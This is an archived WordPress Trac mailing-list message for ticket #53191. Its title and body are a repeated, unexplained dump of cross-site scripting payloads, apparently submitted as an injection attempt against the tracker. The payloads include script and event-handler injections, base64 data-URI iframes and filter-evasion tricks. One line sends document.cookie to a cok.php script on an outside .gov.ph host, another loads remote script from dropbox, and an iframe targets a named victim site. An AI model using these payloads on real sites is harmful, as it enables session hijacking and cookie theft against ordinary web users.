[wp-trac] [WordPress Trac] #53191: hello”><IMG “””><SCRIPT>alert(document.cookie)</SCRIPT>”> "><IMG SRC="https://h.top4top.io/p_1956vncys0.jpg"ONERROR=JAVASCRIPT:ALERT(6)> <script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT> <script>alert(123)</script> <script>alert("hellox worldss");</script> <script>alert(“XSS”)</script> <script>alert(“XSS”);</script> <script>alert(‘XSS’)</script> “><script>alert(“XSS”)</script> <script>alert(/XSS”)</script> <script>alert(/XSS/)</script> </script><script>alert(1)</script> <>">"/>/">'>'/>/'>/>> <img/src=("RATUXPLOIT");>onerror=prompt(1);> <video src=x onerror=prompt(1);> <audio src=x onerror=prompt(1);> "><iframe/src="javascript:alert(2)"> "><iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> "><form><button formaction=javascript:alert(1)>CLICKME</button></form> "><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTs8L3NjcmlwdD4="> "><svg/onload=prompt(1);> "><select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> "><keygen autofocus onfocus=alert(1)> "><video><source onerror="javascript:alert(1)"> "><img src=x onerror="javascript:window.onerror=alert;throw 1"> "><meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"> "><math><a xlink:href="//goo.gl/nlX0P">click // "><svg><script>alert(/1/)</script> "><svg><script>varmyvar="text";alert(1)//";</script></svg> ~~~~~~~~~~~~~~ </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> "><svg onload="prompt(/0/);"></svg> "><ScRipt>alert(0)</ScRipt> "><scr<script>ipt>alert(1)</scr<script>ipt> "><a href=javascript:alert(1)>Clickme</a> "><body/onhashchange=alert(1)><a href=#>clickit</a> "><img src=x onerror=prompt(/xss+found+by+lutfi/);> "><img src=x onerror=prompt(1);> "><script>onmouseover=alert("xss found by pik4chu")</script> "/></script><svg onload='-/"/-prompt(/baho kag bilat/)//' "><script>alert(String.fromCharCode(120, 115, 115, 32, 102, 111, 117, 110, 100, 32, 98, 121, 32, 112, 105, 107, 52, 99, 104, 117))</script> "><script>alert("xss")</script> "><A HREF="http://www.google.com"><h1>xss</h1></A> test'>';))alert('xss');function a () { function b () { var a=' <script>alert(document.coockie);</script> <script>document.location="http://lgu-virac2010.gov.ph/cok/cok.php?c="+document.cookie</script> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} javascript:prompt(0); javascript:alert(document.domain); javascript:alert("x"); '">'"><img src=x onmouseover=alert(document.domain) ddd=> "onmouseover=alert(document.domain) " http://www.thisislegal.com/tutorials/19 http://ha.ckers.org/xsscalc.html http://sage.math.washington.edu/home/wstein/www/home/agc/lit/javascript/xss.html http://www.w3schools.com/jsref/dom_obj_document.asp http://www.w3schools.com/jsref/dom_obj_event.asp http://excess-xss.com/ <script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT> <script>alert(123)</script> <script>alert("hellox worldss");</script> <script>alert(�XSS�)</script> <script>alert(�XSS�);</script> <script>alert(�XSS�)</script> �><script>alert(�XSS�)</script> <script>alert(/XSS�)</script> <script>alert(/XSS/)</script> </script><script>alert(1)</script> �; alert(1); �)alert(1);// <ScRiPt>alert(1)</sCriPt> <IMG SRC=jAVasCrIPt:alert(�XSS�)> <IMG SRC=�javascript:alert(�XSS�);�> <IMG SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert(�XSS�)> <img src=xss onerror=alert(1)> <iframe src="	javascript:prompt(1)	"> <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt >alert(1) {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=``
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/"><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/')></script> <img src=x onerror=prompt(domain):> <img src=x onerror=alert(domain);> <img src=x onerror=alert(1);> <img src=x onerror=alert(cookie);> "onclick=alert `Test_Xss Lutfi `> "onclick=prompt `Test_Xss`> "><iframe src="example.com"> <iframe id="victim_website" src="https://smkglobalmandiri.sch.id" sandbox="allow-forms allow-scripts"></iframe> hello”><IMG “””><SCRIPT>alert(document.cookie)</SCRIPT>”> "><IMG SRC="https://i.top4top.io/p_1955f81ph0.jpg"ONERROR=JAVASCRIPT:ALERT(6)> <>">"/>/">'>'/>/'>/>> <img/src=https://l.top4top.io/p_1929gvy9s0.jpg onerror=prompt(1);> <video src=x onerror=prompt(1);> <audio src=x onerror=prompt(1);> "><iframe/src="javascript:alert(2)"> "><iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> "><form><button formaction=javascript:alert(1)>CLICKME</button></form> "><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTs8L3NjcmlwdD4="> "><svg/onload=prompt(1);> "><select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> "><keygen autofocus onfocus=alert(1)> "><video><source onerror="javascript:alert(1)"> "><img src=x onerror
WordPress Trac
noreply at wordpress.org
Tue May 11 22:13:14 UTC 2021
#53191: hello”><IMG “””><SCRIPT>alert(document.cookie)</SCRIPT>”> "><IMG
SRC="https://h.top4top.io/p_1956vncys0.jpg"ONERROR=JAVASCRIPT:ALERT(6)>
<script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script> <script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script> <script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script> “><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script> <script>alert(/XSS/)</script>
</script><script>alert(1)</script> <>">"/>/">'>'/>/'>/>>
<img/src=("RATUXPLOIT");>onerror=prompt(1);> <video src=x
onerror=prompt(1);> <audio src=x onerror=prompt(1);>
"><iframe/src="javascript:alert(2)">
"><iframe/src="data:text/html; base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
"><form><button
formaction=javascript:alert(1)>CLICKME</button></form> "><object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTs8L3NjcmlwdD4=">
"><svg/onload=prompt(1);> "><select autofocus onfocus=alert(1)> <textarea
autofocus onfocus=alert(1)> "><keygen autofocus onfocus=alert(1)>
"><video><source onerror="javascript:alert(1)"> "><img src=x
onerror="javascript:window.onerror=alert;throw 1"> "><meta http-
equiv="refresh" content="0;url=//goo.gl/nlX0P"> "><math><a
xlink:href="//goo.gl/nlX0P">click //
"><svg><script>alert(/1/)</script>
"><svg><script>varmyvar="text";alert(1)//";</script></svg>
~~~~~~~~~~~~~~
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> "><svg
onload="prompt(/0/);"></svg> "><ScRipt>alert(0)</ScRipt>
"><scr<script>ipt>alert(1)</scr<script>ipt> "><a
href=javascript:alert(1)>Clickme</a> "><body/onhashchange=alert(1)><a
href=#>clickit</a> "><img src=x onerror=prompt(/xss+found+by+lutfi/);>
"><img src=x onerror=prompt(1);> "><script>onmouseover=alert("xss found by
pik4chu")</script> "/></script><svg onload='-/"/-prompt(/baho kag
bilat/)//' "><script>alert(String.fromCharCode(120, 115, 115, 32, 102, 111,
117, 110, 100, 32, 98, 121, 32, 112, 105, 107, 52, 99, 104, 117))</script>
"><script>alert("xss")</script> "><A
HREF="http://www.google.com"><h1>xss</h1></A>
test'>';))alert('xss');function a () { function b () { var a='
<script>alert(document.coockie);</script> <script>document.location="http
://lgu-virac2010.gov.ph/cok/cok.php?c="+document.cookie</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";
alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
javascript:prompt(0); javascript:alert(document.domain);
javascript:alert("x"); '">'"><img src=x onmouseover=alert(document.domain)
ddd=> "onmouseover=alert(document.domain) "
http://www.thisislegal.com/tutorials/19 http://ha.ckers.org/xsscalc.html
http://sage.math.washington.edu/home/wstein/www/home/agc/lit/javascript/xss.html
http://www.w3schools.com/jsref/dom_obj_document.asp
http://www.w3schools.com/jsref/dom_obj_event.asp http://excess-xss.com/
<script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script> <script>alert("hellox worldss");</script>
<script>alert(�XSS�)</script> <script>alert(�XSS�);</script>
<script>alert(�XSS�)</script> �><script>alert(�XSS�)</script>
<script>alert(/XSS�)</script> <script>alert(/XSS/)</script>
</script><script>alert(1)</script> �; alert(1); �)alert(1);//
<ScRiPt>alert(1)</sCriPt> <IMG SRC=jAVasCrIPt:alert(�XSS�)> <IMG
SRC=�javascript:alert(�XSS�);�> <IMG
SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert(�XSS�)>
<img src=xss onerror=alert(1)> <iframe
src=" javascript:prompt(1) "> <svg><style>{font-
family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt
>alert(1) {Opera} <img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)" <img
src=``
onerror=alert(1)
<script/
src='https://dl.dropbox.com/u/13018058/js.js' / ></script> <ScRipT
5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script
/**/"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>"> <meta
content="
1
; JAVASCRIPT: alert(1)" http-
equiv="refresh"/> <svg><script
xlink:href=data:,window.open('https://www.google.com/')></script>
<img src=x onerror=prompt(domain):> <img src=x onerror=alert(domain);> <img
src=x onerror=alert(1);> <img src=x onerror=alert(cookie);> "onclick=alert
`Test_Xss Lutfi `> "onclick=prompt `Test_Xss`> "><iframe src="example.com">
<iframe id="victim_website" src="https://smkglobalmandiri.sch.id" sandbox
="allow-forms allow-scripts"></iframe> hello”><IMG
“””><SCRIPT>alert(document.cookie)</SCRIPT>”> "><IMG
SRC="https://i.top4top.io/p_1955f81ph0.jpg"ONERROR=JAVASCRIPT:ALERT(6)>
<>">"/>/">'>'/>/'>/>> <img/src=https://l.top4top.io/p_1929gvy9s0.jpg
onerror=prompt(1);> <video src=x onerror=prompt(1);> <audio src=x
onerror=prompt(1);> "><iframe/src="javascript:alert(2)">
"><iframe/src="data:text/html; base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
"><form><button
formaction=javascript:alert(1)>CLICKME</button></form> "><object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTs8L3NjcmlwdD4=">
"><svg/onload=prompt(1);> "><select autofocus onfocus=alert(1)> <textarea
autofocus onfocus=alert(1)> "><keygen autofocus onfocus=alert(1)>
"><video><source onerror="javascript:alert(1)"> "><img src=x onerror
---------------------------+-----------------------------
Reporter: lutfimuhammad | Owner: (none)
Type: defect (bug) | Status: assigned
Priority: normal | Milestone: Awaiting Review
Component: General | Version:
Severity: normal | Keywords:
Focuses: |
---------------------------+-----------------------------
hello”><IMG “””><SCRIPT>alert(document.cookie)</SCRIPT>”>
"><IMG
SRC="https://h.top4top.io/p_1956vncys0.jpg"ONERROR=JAVASCRIPT:ALERT(6)>
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script>
“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
<>">"/>/">'>'/>/'>/>> <img/src=("RATUXPLOIT");>onerror=prompt(1);> <video
src=x onerror=prompt(1);> <audio src=x onerror=prompt(1);>
"><iframe/src="javascript:alert(2)">
"><iframe/src="data:text/html; base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
"><form><button
formaction=javascript:alert(1)>CLICKME</button></form> "><object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTs8L3NjcmlwdD4=">
"><svg/onload=prompt(1);> "><select autofocus onfocus=alert(1)> <textarea
autofocus onfocus=alert(1)> "><keygen autofocus onfocus=alert(1)>
"><video><source onerror="javascript:alert(1)"> "><img src=x
onerror="javascript:window.onerror=alert;throw 1"> "><meta http-
equiv="refresh" content="0;url=//goo.gl/nlX0P"> "><math><a
xlink:href="//goo.gl/nlX0P">click //
"><svg><script>alert(/1/)</script>
"><svg><script>varmyvar="text";alert(1)//";</script></svg>
~~~~~~~~~~~~~~
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> "><svg
onload="prompt(/0/);"></svg> "><ScRipt>alert(0)</ScRipt>
"><scr<script>ipt>alert(1)</scr<script>ipt> "><a
href=javascript:alert(1)>Clickme</a> "><body/onhashchange=alert(1)><a
href=#>clickit</a> "><img src=x onerror=prompt(/xss+found+by+lutfi/);>
"><img src=x onerror=prompt(1);> "><script>onmouseover=alert("xss found by
pik4chu")</script> "/></script><svg onload='-/"/-prompt(/baho kag
bilat/)//' "><script>alert(String.fromCharCode(120, 115, 115, 32, 102,
111, 117, 110, 100, 32, 98, 121, 32, 112, 105, 107, 52, 99, 104,
117))</script> "><script>alert("xss")</script> "><A
HREF="http://www.google.com"><h1>xss</h1></A>
test'>';))alert('xss');function a () { function b () { var a='
<script>alert(document.coockie);</script> <script>document.location="http
://lgu-virac2010.gov.ph/cok/cok.php?c="+document.cookie</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";
alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
javascript:prompt(0); javascript:alert(document.domain);
javascript:alert("x"); '">'"><img src=x onmouseover=alert(document.domain)
ddd=> "onmouseover=alert(document.domain) "
http://www.thisislegal.com/tutorials/19 http://ha.ckers.org/xsscalc.html
http://sage.math.washington.edu/home/wstein/www/home/agc/lit/javascript/xss.html
http://www.w3schools.com/jsref/dom_obj_document.asp
http://www.w3schools.com/jsref/dom_obj_event.asp http://excess-xss.com/
<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(�XSS�)</script>
<script>alert(�XSS�);</script>
<script>alert(�XSS�)</script>
�><script>alert(�XSS�)</script>
<script>alert(/XSS�)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
�; alert(1);
�)alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(�XSS�)>
<IMG SRC=�javascript:alert(�XSS�);�>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(�XSS�)>
<img src=xss onerror=alert(1)>
<iframe src=" javascript:prompt(1) ">
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=``
onerror=alert(1)
<script/ src='https://dl.dropbox.com/u/13018058/js.js'
/ ></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script
/**/"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
1
; JAVASCRIPT: alert(1)" http-
equiv="refresh"/>
<svg><script
xlink:href=data:,window.open('https://www.google.com/')></script>
<img src=x onerror=prompt(domain):>
<img src=x onerror=alert(domain);>
<img src=x onerror=alert(1);>
<img src=x onerror=alert(cookie);>
"onclick=alert `Test_Xss Lutfi `>
"onclick=prompt `Test_Xss`>
"><iframe src="example.com">
<iframe id="victim_website" src="https://smkglobalmandiri.sch.id"
sandbox="allow-forms allow-scripts"></iframe> hello”><IMG
“””><SCRIPT>alert(document.cookie)</SCRIPT>”> "><IMG
SRC="https://i.top4top.io/p_1955f81ph0.jpg"ONERROR=JAVASCRIPT:ALERT(6)>
<>">"/>/">'>'/>/'>/>> <img/src=https://l.top4top.io/p_1929gvy9s0.jpg
onerror=prompt(1);> <video src=x onerror=prompt(1);> <audio src=x
onerror=prompt(1);> "><iframe/src="javascript:alert(2)">
"><iframe/src="data:text/html; base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
"><form><button
formaction=javascript:alert(1)>CLICKME</button></form> "><object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTs8L3NjcmlwdD4=">
"><svg/onload=prompt(1);> "><select autofocus onfocus=alert(1)> <textarea
autofocus onfocus=alert(1)> "><keygen autofocus onfocus=alert(1)>
"><video><source onerror="javascript:alert(1)"> "><img src=x onerror
--
Ticket URL: <https://core.trac.wordpress.org/ticket/53191>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list